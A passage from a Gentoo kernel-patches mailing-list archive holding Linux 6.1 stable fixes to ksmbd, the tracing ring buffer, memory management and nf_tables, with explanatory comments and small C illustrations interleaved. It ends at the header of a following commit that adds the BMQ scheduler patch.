+ 	struct ksmbd_file	*lfp;
+ 	struct ksmbd_inode	*ci;
++	struct inode		*inode = d_inode(dentry);
+ 
+-	ci = ksmbd_inode_lookup_by_vfsinode(inode);
++	read_lock(&inode_hash_lock);
++	ci = __ksmbd_inode_lookup(dentry);
++	read_unlock(&inode_hash_lock);
+ 	if (!ci)
+ 		return NULL;
+ 
+@@ -572,6 +581,7 @@ struct ksmbd_file *ksmbd_open_fd(struct ksmbd_work *work, struct file *filp)
+ 	fp->tcon		= work->tcon;
+ 	fp->volatile_id		= KSMBD_NO_FID;
+ 	fp->persistent_id	= KSMBD_NO_FID;
++	fp->f_state		= FP_NEW;
+ 	fp->f_ci		= ksmbd_inode_get(fp);
+ 
+ 	if (!fp->f_ci) {
+@@ -593,6 +603,17 @@ err_out:
+ 	return ERR_PTR(ret);
+ }
+ 
++void ksmbd_update_fstate(struct ksmbd_file_table *ft, struct ksmbd_file *fp,
++			 unsigned int state)
++{
++	if (!fp)
++		return;
++
++	write_lock(&ft->lock);
++	fp->f_state = state;
++	write_unlock(&ft->lock);
++}
++
+ static int
+ __close_file_table_ids(struct ksmbd_file_table *ft,
+ 		       struct ksmbd_tree_connect *tcon,
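The new f_state field closes an open/close race: a ksmbd_file is visible in the IDR from the moment it is inserted, so without a state gate a concurrent close, or a lookup from another work item, could grab a half-constructed fp, or two closers could both drop the final reference. The lifecycle, serialized by ft->lock:

/* ksmbd_open_fd():   fp->f_state = FP_NEW;  insert into ft->idr
 * setup complete:    ksmbd_update_fstate(ft, fp, FP_INITED);
 * ksmbd_fp_get():    fp->f_state != FP_INITED  -> NULL (not usable yet/anymore)
 * ksmbd_close_fd():  under write_lock(&ft->lock):
 *                    FP_INITED -> FP_CLOSED, then drop the refcount exactly once
 */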
+diff --git a/fs/smb/server/vfs_cache.h b/fs/smb/server/vfs_cache.h
+index fcb13413fa8d9..a528f0cc775ae 100644
+--- a/fs/smb/server/vfs_cache.h
++++ b/fs/smb/server/vfs_cache.h
+@@ -51,7 +51,7 @@ struct ksmbd_inode {
+ 	atomic_t			op_count;
+ 	/* opinfo count for streams */
+ 	atomic_t			sop_count;
+-	struct inode			*m_inode;
++	struct dentry			*m_de;
+ 	unsigned int			m_flags;
+ 	struct hlist_node		m_hash;
+ 	struct list_head		m_fp_list;
+@@ -60,6 +60,12 @@ struct ksmbd_inode {
+ 	__le32				m_fattr;
+ };
+ 
++enum {
++	FP_NEW = 0,
++	FP_INITED,
++	FP_CLOSED
++};
++
+ struct ksmbd_file {
+ 	struct file			*filp;
+ 	u64				persistent_id;
+@@ -98,6 +104,8 @@ struct ksmbd_file {
+ 	/* if ls is happening on directory, below is valid*/
+ 	struct ksmbd_readdir_data	readdir_data;
+ 	int				dot_dotdot[2];
++	unsigned int			f_state;
++	bool				reserve_lease_break;
+ };
+ 
+ static inline void set_ctx_actor(struct dir_context *ctx,
+@@ -131,9 +139,11 @@ struct ksmbd_file *ksmbd_lookup_foreign_fd(struct ksmbd_work *work, u64 id);
+ struct ksmbd_file *ksmbd_lookup_fd_slow(struct ksmbd_work *work, u64 id,
+ 					u64 pid);
+ void ksmbd_fd_put(struct ksmbd_work *work, struct ksmbd_file *fp);
++struct ksmbd_inode *ksmbd_inode_lookup_lock(struct dentry *d);
++void ksmbd_inode_put(struct ksmbd_inode *ci);
+ struct ksmbd_file *ksmbd_lookup_durable_fd(unsigned long long id);
+ struct ksmbd_file *ksmbd_lookup_fd_cguid(char *cguid);
+-struct ksmbd_file *ksmbd_lookup_fd_inode(struct inode *inode);
++struct ksmbd_file *ksmbd_lookup_fd_inode(struct dentry *dentry);
+ unsigned int ksmbd_open_durable_fd(struct ksmbd_file *fp);
+ struct ksmbd_file *ksmbd_open_fd(struct ksmbd_work *work, struct file *filp);
+ void ksmbd_close_tree_conn_fds(struct ksmbd_work *work);
+@@ -142,6 +152,8 @@ int ksmbd_close_inode_fds(struct ksmbd_work *work, struct inode *inode);
+ int ksmbd_init_global_file_table(void);
+ void ksmbd_free_global_file_table(void);
+ void ksmbd_set_fd_limit(unsigned long limit);
++void ksmbd_update_fstate(struct ksmbd_file_table *ft, struct ksmbd_file *fp,
++			 unsigned int state);
+ 
+ /*
+  * INODE hash
+@@ -155,7 +167,7 @@ enum KSMBD_INODE_STATUS {
+ 	KSMBD_INODE_STATUS_PENDING_DELETE,
+ };
+ 
+-int ksmbd_query_inode_status(struct inode *inode);
++int ksmbd_query_inode_status(struct dentry *dentry);
+ bool ksmbd_inode_pending_delete(struct ksmbd_file *fp);
+ void ksmbd_set_inode_pending_delete(struct ksmbd_file *fp);
+ void ksmbd_clear_inode_pending_delete(struct ksmbd_file *fp);
+diff --git a/include/linux/blkdev.h b/include/linux/blkdev.h
+index 57674b3c58774..07a7eeef47d39 100644
+--- a/include/linux/blkdev.h
++++ b/include/linux/blkdev.h
+@@ -565,7 +565,7 @@ struct request_queue {
+ #define QUEUE_FLAG_NOXMERGES	9	/* No extended merges */
+ #define QUEUE_FLAG_ADD_RANDOM	10	/* Contributes to random pool */
+ #define QUEUE_FLAG_SAME_FORCE	12	/* force complete on same CPU */
+-#define QUEUE_FLAG_HW_WC	18	/* Write back caching supported */
++#define QUEUE_FLAG_HW_WC	13	/* Write back caching supported */
+ #define QUEUE_FLAG_INIT_DONE	14	/* queue is initialized */
+ #define QUEUE_FLAG_STABLE_WRITES 15	/* don't modify blks until WB is done */
+ #define QUEUE_FLAG_POLL		16	/* IO polling enabled if set */
+diff --git a/include/linux/export-internal.h b/include/linux/export-internal.h
+index fe7e6ba918f10..29de29af9546c 100644
+--- a/include/linux/export-internal.h
++++ b/include/linux/export-internal.h
+@@ -12,6 +12,7 @@
+ 
+ #define SYMBOL_CRC(sym, crc, sec)   \
+ 	asm(".section \"___kcrctab" sec "+" #sym "\",\"a\""	"\n" \
++	    ".balign 4"						"\n" \
+ 	    "__crc_" #sym ":"					"\n" \
+ 	    ".long " #crc					"\n" \
+ 	    ".previous"						"\n")
+diff --git a/include/linux/module.h b/include/linux/module.h
+index ec61fb53979a9..35876e89eb93f 100644
+--- a/include/linux/module.h
++++ b/include/linux/module.h
+@@ -879,8 +879,17 @@ static inline bool module_sig_ok(struct module *module)
+ }
+ #endif	/* CONFIG_MODULE_SIG */
+ 
++#if defined(CONFIG_MODULES) && defined(CONFIG_KALLSYMS)
+ int module_kallsyms_on_each_symbol(int (*fn)(void *, const char *,
+ 					     struct module *, unsigned long),
+ 				   void *data);
++#else
++static inline int module_kallsyms_on_each_symbol(int (*fn)(void *, const char *,
++						 struct module *, unsigned long),
++						 void *data)
++{
++	return -EOPNOTSUPP;
++}
++#endif  /* CONFIG_MODULES && CONFIG_KALLSYMS */
+ 
+ #endif /* _LINUX_MODULE_H */
+diff --git a/include/linux/namei.h b/include/linux/namei.h
+index 00fee52df8423..5c0149603dc3d 100644
+--- a/include/linux/namei.h
++++ b/include/linux/namei.h
+@@ -57,12 +57,18 @@ static inline int user_path_at(int dfd, const char __user *name, unsigned flags,
+ 	return user_path_at_empty(dfd, name, flags, path, NULL);
+ }
+ 
++struct dentry *lookup_one_qstr_excl(const struct qstr *name,
++				    struct dentry *base,
++				    unsigned int flags);
+ extern int kern_path(const char *, unsigned, struct path *);
+ 
+ extern struct dentry *kern_path_create(int, const char *, struct path *, unsigned int);
+ extern struct dentry *user_path_create(int, const char __user *, struct path *, unsigned int);
+ extern void done_path_create(struct path *, struct dentry *);
+ extern struct dentry *kern_path_locked(const char *, struct path *);
++int vfs_path_parent_lookup(struct filename *filename, unsigned int flags,
++			   struct path *parent, struct qstr *last, int *type,
++			   const struct path *root);
+ 
+ extern struct dentry *try_lookup_one_len(const char *, struct dentry *, int);
+ extern struct dentry *lookup_one_len(const char *, struct dentry *, int);
+@@ -81,6 +87,7 @@ extern int follow_down(struct path *);
+ extern int follow_up(struct path *);
+ 
+ extern struct dentry *lock_rename(struct dentry *, struct dentry *);
++extern struct dentry *lock_rename_child(struct dentry *, struct dentry *);
+ extern void unlock_rename(struct dentry *, struct dentry *);
+ 
+ extern int __must_check nd_jump_link(const struct path *path);
+diff --git a/include/linux/property.h b/include/linux/property.h
+index 117cc200c656d..587b5b666b5bb 100644
+--- a/include/linux/property.h
++++ b/include/linux/property.h
+@@ -32,7 +32,12 @@ enum dev_dma_attr {
+ 	DEV_DMA_COHERENT,
+ };
+ 
+-struct fwnode_handle *dev_fwnode(const struct device *dev);
++const struct fwnode_handle *__dev_fwnode_const(const struct device *dev);
++struct fwnode_handle *__dev_fwnode(struct device *dev);
++#define dev_fwnode(dev)							\
++	_Generic((dev),							\
++		 const struct device *: __dev_fwnode_const,	\
++		 struct device *: __dev_fwnode)(dev)
+ 
+ bool device_property_present(struct device *dev, const char *propname);
+ int device_property_read_u8_array(struct device *dev, const char *propname,
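The _Generic dispatch above lets one macro name preserve constness: a caller holding a const struct device * gets a const fwnode handle back, while a mutable caller keeps a mutable result. A minimal userspace sketch of the same trick, using hypothetical types rather than the driver-core ones:

#include <stdio.h>

struct handle { int id; };
struct device { struct handle hnd; };

const struct handle *get_hnd_const(const struct device *d) { return &d->hnd; }
struct handle *get_hnd(struct device *d) { return &d->hnd; }

#define dev_hnd(dev)					\
	_Generic((dev),					\
		 const struct device *: get_hnd_const,	\
		 struct device *: get_hnd)(dev)

int main(void)
{
	struct device d = { { 42 } };
	const struct device *cd = &d;

	dev_hnd(&d)->id = 7;			/* mutable path        */
	printf("%d\n", dev_hnd(cd)->id);	/* const path prints 7 */
	return 0;
}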
+diff --git a/include/linux/spi/spi.h b/include/linux/spi/spi.h
+index 877395e075afe..8e9054d9f6df0 100644
+--- a/include/linux/spi/spi.h
++++ b/include/linux/spi/spi.h
+@@ -263,6 +263,26 @@ static inline void *spi_get_drvdata(struct spi_device *spi)
+ 	return dev_get_drvdata(&spi->dev);
+ }
+ 
++static inline u8 spi_get_chipselect(const struct spi_device *spi, u8 idx)
++{
++	return spi->chip_select;
++}
++
++static inline void spi_set_chipselect(struct spi_device *spi, u8 idx, u8 chipselect)
++{
++	spi->chip_select = chipselect;
++}
++
++static inline struct gpio_desc *spi_get_csgpiod(const struct spi_device *spi, u8 idx)
++{
++	return spi->cs_gpiod;
++}
++
++static inline void spi_set_csgpiod(struct spi_device *spi, u8 idx, struct gpio_desc *csgpiod)
++{
++	spi->cs_gpiod = csgpiod;
++}
++
+ struct spi_message;
+ 
+ /**
+@@ -1515,6 +1535,9 @@ extern void spi_unregister_device(struct spi_device *spi);
+ extern const struct spi_device_id *
+ spi_get_device_id(const struct spi_device *sdev);
+ 
++extern const void *
++spi_get_device_match_data(const struct spi_device *sdev);
++
+ static inline bool
+ spi_transfer_is_last(struct spi_controller *ctlr, struct spi_transfer *xfer)
+ {
+diff --git a/kernel/module/kallsyms.c b/kernel/module/kallsyms.c
+index f5c5c9175333d..4523f99b03589 100644
+--- a/kernel/module/kallsyms.c
++++ b/kernel/module/kallsyms.c
+@@ -494,7 +494,6 @@ unsigned long module_kallsyms_lookup_name(const char *name)
+ 	return ret;
+ }
+ 
+-#ifdef CONFIG_LIVEPATCH
+ int module_kallsyms_on_each_symbol(int (*fn)(void *, const char *,
+ 					     struct module *, unsigned long),
+ 				   void *data)
+@@ -531,4 +530,3 @@ out:
+ 	mutex_unlock(&module_mutex);
+ 	return ret;
+ }
+-#endif /* CONFIG_LIVEPATCH */
+diff --git a/kernel/trace/ring_buffer.c b/kernel/trace/ring_buffer.c
+index 61803208706a5..06d52525407b8 100644
+--- a/kernel/trace/ring_buffer.c
++++ b/kernel/trace/ring_buffer.c
+@@ -705,48 +705,6 @@ rb_time_read_cmpxchg(local_t *l, unsigned long expect, unsigned long set)
+ 	return ret == expect;
+ }
+ 
+-static int rb_time_cmpxchg(rb_time_t *t, u64 expect, u64 set)
+-{
+-	unsigned long cnt, top, bottom, msb;
+-	unsigned long cnt2, top2, bottom2, msb2;
+-	u64 val;
+-
+-	/* Any interruptions in this function should cause a failure */
+-	cnt = local_read(&t->cnt);
+-
+-	/* The cmpxchg always fails if it interrupted an update */
+-	 if (!__rb_time_read(t, &val, &cnt2))
+-		 return false;
+-
+-	 if (val != expect)
+-		 return false;
+-
+-	 if ((cnt & 3) != cnt2)
+-		 return false;
+-
+-	 cnt2 = cnt + 1;
+-
+-	 rb_time_split(val, &top, &bottom, &msb);
+-	 msb = rb_time_val_cnt(msb, cnt);
+-	 top = rb_time_val_cnt(top, cnt);
+-	 bottom = rb_time_val_cnt(bottom, cnt);
+-
+-	 rb_time_split(set, &top2, &bottom2, &msb2);
+-	 msb2 = rb_time_val_cnt(msb2, cnt);
+-	 top2 = rb_time_val_cnt(top2, cnt2);
+-	 bottom2 = rb_time_val_cnt(bottom2, cnt2);
+-
+-	if (!rb_time_read_cmpxchg(&t->cnt, cnt, cnt2))
+-		return false;
+-	if (!rb_time_read_cmpxchg(&t->msb, msb, msb2))
+-		return false;
+-	if (!rb_time_read_cmpxchg(&t->top, top, top2))
+-		return false;
+-	if (!rb_time_read_cmpxchg(&t->bottom, bottom, bottom2))
+-		return false;
+-	return true;
+-}
+-
+ #else /* 64 bits */
+ 
+ /* local64_t always succeeds */
+@@ -760,13 +718,6 @@ static void rb_time_set(rb_time_t *t, u64 val)
+ {
+ 	local64_set(&t->time, val);
+ }
+-
+-static bool rb_time_cmpxchg(rb_time_t *t, u64 expect, u64 set)
+-{
+-	u64 val;
+-	val = local64_cmpxchg(&t->time, expect, set);
+-	return val == expect;
+-}
+ #endif
+ 
+ /*
+@@ -935,9 +886,14 @@ static __always_inline bool full_hit(struct trace_buffer *buffer, int cpu, int f
+ 	if (!nr_pages || !full)
+ 		return true;
+ 
+-	dirty = ring_buffer_nr_dirty_pages(buffer, cpu);
++	/*
++	 * Add one as dirty will never equal nr_pages, as the sub-buffer
++	 * that the writer is on is not counted as dirty.
++	 * This is needed if "buffer_percent" is set to 100.
++	 */
++	dirty = ring_buffer_nr_dirty_pages(buffer, cpu) + 1;
+ 
+-	return (dirty * 100) > (full * nr_pages);
++	return (dirty * 100) >= (full * nr_pages);
+ }
+ 
+ /*
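The "+ 1" and the switch from ">" to ">=" work together: the sub-buffer the writer sits on is never counted as dirty, so under the old test a buffer_percent of 100 could never be satisfied. A standalone userspace mock of the arithmetic (an illustration, not the kernel function itself):

#include <stdbool.h>
#include <stdio.h>

static bool full_hit_old(int dirty, int full, int nr_pages)
{
	return (dirty * 100) > (full * nr_pages);
}

static bool full_hit_new(int dirty, int full, int nr_pages)
{
	return ((dirty + 1) * 100) >= (full * nr_pages);
}

int main(void)
{
	int nr_pages = 4, full = 100;
	int dirty = nr_pages - 1;	/* writer's sub-buffer never counted */

	printf("old: %d  new: %d\n",
	       full_hit_old(dirty, full, nr_pages),	/* 300 > 400  -> 0 */
	       full_hit_new(dirty, full, nr_pages));	/* 400 >= 400 -> 1 */
	return 0;
}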
+@@ -997,7 +953,8 @@ void ring_buffer_wake_waiters(struct trace_buffer *buffer, int cpu)
+ 	/* make sure the waiters see the new index */
+ 	smp_wmb();
+ 
+-	rb_wake_up_waiters(&rbwork->work);
++	/* This can be called in any context */
++	irq_work_queue(&rbwork->work);
+ }
+ 
+ /**
+@@ -2981,25 +2938,6 @@ static unsigned rb_calculate_event_length(unsigned length)
+ 	return length;
+ }
+ 
+-static u64 rb_time_delta(struct ring_buffer_event *event)
+-{
+-	switch (event->type_len) {
+-	case RINGBUF_TYPE_PADDING:
+-		return 0;
+-
+-	case RINGBUF_TYPE_TIME_EXTEND:
+-		return rb_event_time_stamp(event);
+-
+-	case RINGBUF_TYPE_TIME_STAMP:
+-		return 0;
+-
+-	case RINGBUF_TYPE_DATA:
+-		return event->time_delta;
+-	default:
+-		return 0;
+-	}
+-}
+-
+ static inline int
+ rb_try_to_discard(struct ring_buffer_per_cpu *cpu_buffer,
+ 		  struct ring_buffer_event *event)
+@@ -3008,8 +2946,6 @@ rb_try_to_discard(struct ring_buffer_per_cpu *cpu_buffer,
+ 	struct buffer_page *bpage;
+ 	unsigned long index;
+ 	unsigned long addr;
+-	u64 write_stamp;
+-	u64 delta;
+ 
+ 	new_index = rb_event_index(event);
+ 	old_index = new_index + rb_event_ts_length(event);
+@@ -3018,14 +2954,10 @@ rb_try_to_discard(struct ring_buffer_per_cpu *cpu_buffer,
+ 
+ 	bpage = READ_ONCE(cpu_buffer->tail_page);
+ 
+-	delta = rb_time_delta(event);
+-
+-	if (!rb_time_read(&cpu_buffer->write_stamp, &write_stamp))
+-		return 0;
+-
+-	/* Make sure the write stamp is read before testing the location */
+-	barrier();
+-
++	/*
++	 * Make sure the tail_page is still the same and
++	 * the next write location is the end of this event
++	 */
+ 	if (bpage->page == (void *)addr && rb_page_write(bpage) == old_index) {
+ 		unsigned long write_mask =
+ 			local_read(&bpage->write) & ~RB_WRITE_MASK;
+@@ -3036,20 +2968,20 @@ rb_try_to_discard(struct ring_buffer_per_cpu *cpu_buffer,
+ 		 * to make sure that the next event adds an absolute
+ 		 * value and does not rely on the saved write stamp, which
+ 		 * is now going to be bogus.
++		 *
++		 * By setting the before_stamp to zero, the next event
++		 * is not going to use the write_stamp and will instead
++		 * create an absolute timestamp. This means there's no
++		 * reason to update the write_stamp!

+ 		 */
+ 		rb_time_set(&cpu_buffer->before_stamp, 0);
+ 
+-		/* Something came in, can't discard */
+-		if (!rb_time_cmpxchg(&cpu_buffer->write_stamp,
+-				       write_stamp, write_stamp - delta))
+-			return 0;
+-
+ 		/*
+ 		 * If an event were to come in now, it would see that the
+ 		 * write_stamp and the before_stamp are different, and assume
+ 		 * that this event just added itself before updating
+ 		 * the write stamp. The interrupting event will fix the
+-		 * write stamp for us, and use the before stamp as its delta.
++		 * write stamp for us, and use an absolute timestamp.
+ 		 */
+ 
+ 		/*
+@@ -3488,7 +3420,7 @@ static void check_buffer(struct ring_buffer_per_cpu *cpu_buffer,
+ 		return;
+ 
+ 	/*
+-	 * If this interrupted another event, 
++	 * If this interrupted another event,
+ 	 */
+ 	if (atomic_inc_return(this_cpu_ptr(&checking)) != 1)
+ 		goto out;
+@@ -3632,20 +3564,36 @@ __rb_reserve_next(struct ring_buffer_per_cpu *cpu_buffer,
+ 	} else {
+ 		u64 ts;
+ 		/* SLOW PATH - Interrupted between A and C */
+-		a_ok = rb_time_read(&cpu_buffer->write_stamp, &info->after);
+-		/* Was interrupted before here, write_stamp must be valid */
++
++		/* Save the old before_stamp */
++		a_ok = rb_time_read(&cpu_buffer->before_stamp, &info->before);
+ 		RB_WARN_ON(cpu_buffer, !a_ok);
++
++		/*
++		 * Read a new timestamp and update the before_stamp to make
++		 * the next event after this one force using an absolute
++		 * timestamp. This is in case an interrupt were to come in
++		 * between E and F.
++		 */
+ 		ts = rb_time_stamp(cpu_buffer->buffer);
++		rb_time_set(&cpu_buffer->before_stamp, ts);
++
+ 		barrier();
+- /*E*/		if (write == (local_read(&tail_page->write) & RB_WRITE_MASK) &&
+-		    info->after < ts &&
+-		    rb_time_cmpxchg(&cpu_buffer->write_stamp,
+-				    info->after, ts)) {
+-			/* Nothing came after this event between C and E */
++ /*E*/		a_ok = rb_time_read(&cpu_buffer->write_stamp, &info->after);
++		/* Was interrupted before here, write_stamp must be valid */
++		RB_WARN_ON(cpu_buffer, !a_ok);
++		barrier();
++ /*F*/		if (write == (local_read(&tail_page->write) & RB_WRITE_MASK) &&
++		    info->after == info->before && info->after < ts) {
++			/*
++			 * Nothing came after this event between C and F, it is
++			 * safe to use info->after for the delta as it
++			 * matched info->before and is still valid.
++			 */
+ 			info->delta = ts - info->after;
+ 		} else {
+ 			/*
+-			 * Interrupted between C and E:
++			 * Interrupted between C and F:
+ 			 * Lost the previous events time stamp. Just set the
+ 			 * delta to zero, and this will be the same time as
+ 			 * the event this event interrupted. And the events that
+diff --git a/kernel/trace/trace.c b/kernel/trace/trace.c
+index 87eca95b57fb3..deae65af76ecf 100644
+--- a/kernel/trace/trace.c
++++ b/kernel/trace/trace.c
+@@ -1850,6 +1850,9 @@ update_max_tr(struct trace_array *tr, struct task_struct *tsk, int cpu,
+ 	__update_max_tr(tr, tsk, cpu);
+ 
+ 	arch_spin_unlock(&tr->max_lock);
++
++	/* Any waiters on the old snapshot buffer need to wake up */
++	ring_buffer_wake_waiters(tr->array_buffer.buffer, RING_BUFFER_ALL_CPUS);
+ }
+ 
+ /**
+@@ -1901,12 +1904,23 @@ update_max_tr_single(struct trace_array *tr, struct task_struct *tsk, int cpu)
+ 
+ static int wait_on_pipe(struct trace_iterator *iter, int full)
+ {
++	int ret;
++
+ 	/* Iterators are static, they should be filled or empty */
+ 	if (trace_buffer_iter(iter, iter->cpu_file))
+ 		return 0;
+ 
+-	return ring_buffer_wait(iter->array_buffer->buffer, iter->cpu_file,
+-				full);
++	ret = ring_buffer_wait(iter->array_buffer->buffer, iter->cpu_file, full);
++
++#ifdef CONFIG_TRACER_MAX_TRACE
++	/*
++	 * Make sure this is still the snapshot buffer, as if a snapshot were
++	 * to happen, this would now be the main buffer.
++	 */
++	if (iter->snapshot)
++		iter->array_buffer = &iter->tr->max_buffer;
++#endif
++	return ret;
+ }
+ 
+ #ifdef CONFIG_FTRACE_STARTUP_TEST
+@@ -8433,7 +8447,7 @@ tracing_buffers_splice_read(struct file *file, loff_t *ppos,
+ 
+ 		wait_index = READ_ONCE(iter->wait_index);
+ 
+-		ret = wait_on_pipe(iter, iter->tr->buffer_percent);
++		ret = wait_on_pipe(iter, iter->snapshot ? 0 : iter->tr->buffer_percent);
+ 		if (ret)
+ 			goto out;
+ 
+diff --git a/kernel/trace/trace_kprobe.c b/kernel/trace/trace_kprobe.c
+index a34a4fcdab7b1..e3993d19687db 100644
+--- a/kernel/trace/trace_kprobe.c
++++ b/kernel/trace/trace_kprobe.c
+@@ -714,14 +714,31 @@ static int count_symbols(void *data, unsigned long unused)
+ 	return 0;
+ }
+ 
++struct sym_count_ctx {
++	unsigned int count;
++	const char *name;
++};
++
++static int count_mod_symbols(void *data, const char *name,
++			     struct module *module, unsigned long unused)
++{
++	struct sym_count_ctx *ctx = data;
++
++	if (strcmp(name, ctx->name) == 0)
++		ctx->count++;
++
++	return 0;
++}
++
+ static unsigned int number_of_same_symbols(char *func_name)
+ {
+-	unsigned int count;
++	struct sym_count_ctx ctx = { .count = 0, .name = func_name };
++
++	kallsyms_on_each_match_symbol(count_symbols, func_name, &ctx.count);
+ 
+-	count = 0;
+-	kallsyms_on_each_match_symbol(count_symbols, func_name, &count);
++	module_kallsyms_on_each_symbol(count_mod_symbols, &ctx);
+ 
+-	return count;
++	return ctx.count;
+ }
+ 
+ static int __trace_kprobe_create(int argc, const char *argv[])
+diff --git a/mm/filemap.c b/mm/filemap.c
+index d633ab8cd56f1..10fe6430693bd 100644
+--- a/mm/filemap.c
++++ b/mm/filemap.c
+@@ -2744,6 +2744,15 @@ ssize_t filemap_read(struct kiocb *iocb, struct iov_iter *iter,
+ 			goto put_folios;
+ 		end_offset = min_t(loff_t, isize, iocb->ki_pos + iter->count);
+ 
++		/*
++		 * Pairs with a barrier in
++		 * block_write_end()->mark_buffer_dirty() or other page
++		 * dirtying routines like iomap_write_end() to ensure
++		 * changes to page contents are visible before we see
++		 * increased inode size.
++		 */
++		smp_rmb();
++
+ 		/*
+ 		 * Once we start copying data, we don't want to be touching any
+ 		 * cachelines that might be contended:
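The pairing the comment describes is the usual publish/consume pattern: the writer orders "dirty the page contents" before "publish the larger i_size", and the reader loads the size first, then fences, then touches the contents. An illustrative C11 userspace analogy (stand-ins for the kernel's primitives, not the real ones):

#include <stdatomic.h>
#include <stddef.h>

static char data[4096];
static atomic_size_t isize;	/* stands in for i_size; newsize >= 1 assumed */

void writer(size_t newsize, char byte)
{
	data[newsize - 1] = byte;			/* dirty the "page"  */
	atomic_thread_fence(memory_order_release);	/* ~ smp_wmb()       */
	atomic_store_explicit(&isize, newsize, memory_order_relaxed);
}

char reader(void)
{
	size_t end = atomic_load_explicit(&isize, memory_order_relaxed);

	atomic_thread_fence(memory_order_acquire);	/* ~ smp_rmb()       */
	return end ? data[end - 1] : 0;	/* contents at least as new as size */
}

int main(void)
{
	writer(100, 'x');
	return reader() == 'x' ? 0 : 1;
}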
+diff --git a/mm/memory-failure.c b/mm/memory-failure.c
+index 99de0328d1bed..ebd717157c813 100644
+--- a/mm/memory-failure.c
++++ b/mm/memory-failure.c
+@@ -1421,7 +1421,7 @@ static bool hwpoison_user_mappings(struct page *p, unsigned long pfn,
+ 	 * This check implies we don't kill processes if their pages
+ 	 * are in the swap cache early. Those are always late kills.
+ 	 */
+-	if (!page_mapped(hpage))
++	if (!page_mapped(p))
+ 		return true;
+ 
+ 	if (PageKsm(p)) {
+@@ -1477,10 +1477,10 @@ static bool hwpoison_user_mappings(struct page *p, unsigned long pfn,
+ 		try_to_unmap(folio, ttu);
+ 	}
+ 
+-	unmap_success = !page_mapped(hpage);
++	unmap_success = !page_mapped(p);
+ 	if (!unmap_success)
+ 		pr_err("%#lx: failed to unmap page (mapcount=%d)\n",
+-		       pfn, page_mapcount(hpage));
++		       pfn, page_mapcount(p));
+ 
+ 	/*
+ 	 * try_to_unmap() might put mlocked page in lru cache, so call
+@@ -1560,7 +1560,7 @@ static void unmap_and_kill(struct list_head *to_kill, unsigned long pfn,
+ 		 * mapping being torn down is communicated in siginfo, see
+ 		 * kill_proc()
+ 		 */
+-		loff_t start = (index << PAGE_SHIFT) & ~(size - 1);
++		loff_t start = ((loff_t)index << PAGE_SHIFT) & ~(size - 1);
+ 
+ 		unmap_mapping_range(mapping, start, size, 0);
+ 	}
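Without the (loff_t) cast, the shift is evaluated in the width of the page index type and can wrap before being widened, handing unmap_mapping_range() the wrong offset. A standalone sketch of the wraparound, assuming a 32-bit index for illustration:

#include <stdint.h>
#include <stdio.h>

#define PAGE_SHIFT 12

int main(void)
{
	uint32_t index = 0x00200000;	/* page index at the 8 GiB mark */
	int64_t wrong = (int64_t)(index << PAGE_SHIFT);	/* wraps to 0       */
	int64_t right = (int64_t)index << PAGE_SHIFT;	/* 0x200000000      */

	printf("wrong=%lld right=%lld\n", (long long)wrong, (long long)right);
	return 0;
}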
+diff --git a/mm/migrate.c b/mm/migrate.c
+index 9372a826e6d08..91bd69c61148e 100644
+--- a/mm/migrate.c
++++ b/mm/migrate.c
+@@ -388,6 +388,7 @@ int folio_migrate_mapping(struct address_space *mapping,
+ 	int dirty;
+ 	int expected_count = folio_expected_refs(mapping, folio) + extra_count;
+ 	long nr = folio_nr_pages(folio);
++	long entries, i;
+ 
+ 	if (!mapping) {
+ 		/* Anonymous page without mapping */
+@@ -425,8 +426,10 @@ int folio_migrate_mapping(struct address_space *mapping,
+ 			folio_set_swapcache(newfolio);
+ 			newfolio->private = folio_get_private(folio);
+ 		}
++		entries = nr;
+ 	} else {
+ 		VM_BUG_ON_FOLIO(folio_test_swapcache(folio), folio);
++		entries = 1;
+ 	}
+ 
+ 	/* Move dirty while page refs frozen and newpage not yet exposed */
+@@ -436,7 +439,11 @@ int folio_migrate_mapping(struct address_space *mapping,
+ 		folio_set_dirty(newfolio);
+ 	}
+ 
+-	xas_store(&xas, newfolio);
++	/* Swap cache still stores N entries instead of a high-order entry */
++	for (i = 0; i < entries; i++) {
++		xas_store(&xas, newfolio);
++		xas_next(&xas);
++	}
+ 
+ 	/*
+ 	 * Drop cache reference from old page by unfreezing
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index 05fa5141af516..3d6ebb9877a4e 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -9480,7 +9480,7 @@ static void nft_set_commit_update(struct list_head *set_update_list)
+ 	list_for_each_entry_safe(set, next, set_update_list, pending_update) {
+ 		list_del_init(&set->pending_update);
+ 
+-		if (!set->ops->commit)
++		if (!set->ops->commit || set->dead)
+ 			continue;
+ 
+ 		set->ops->commit(set);


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-01-04 16:10 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-01-04 16:10 UTC (permalink / raw
  To: gentoo-commits

commit:     1eee8df6811822b2ae677d513b5002832503e6e5
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Thu Jan  4 16:10:10 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Thu Jan  4 16:10:10 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=1eee8df6

Add BMQ(BitMap Queue) Scheduler, USE=experimental

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                 |     4 +
 5020_BMQ-and-PDS-io-scheduler-v6.1-r1.patch | 10236 ++++++++++++++++++++++++++
 2 files changed, 10240 insertions(+)

diff --git a/0000_README b/0000_README
index f806635e..9c608802 100644
--- a/0000_README
+++ b/0000_README
@@ -382,3 +382,7 @@ Desc:   Kernel fs for Linux that provides easier uid/gid-shifting for containers
 Patch:  5010_enable-cpu-optimizations-universal.patch
 From:   https://github.com/graysky2/kernel_compiler_patch
 Desc:   Kernel >= 5.15 patch enables gcc = v11.1+ optimizations for additional CPUs.
+
+Patch:  5020_BMQ-and-PDS-io-scheduler-v6.1-r1.patch
+From:   https://gitlab.com/alfredchen/projectc
+Desc:   BMQ(BitMap Queue) Scheduler. A new CPU scheduler developed from PDS(incld). Inspired by the scheduler in zircon.

diff --git a/5020_BMQ-and-PDS-io-scheduler-v6.1-r1.patch b/5020_BMQ-and-PDS-io-scheduler-v6.1-r1.patch
new file mode 100644
index 00000000..882261ca
--- /dev/null
+++ b/5020_BMQ-and-PDS-io-scheduler-v6.1-r1.patch
@@ -0,0 +1,10236 @@
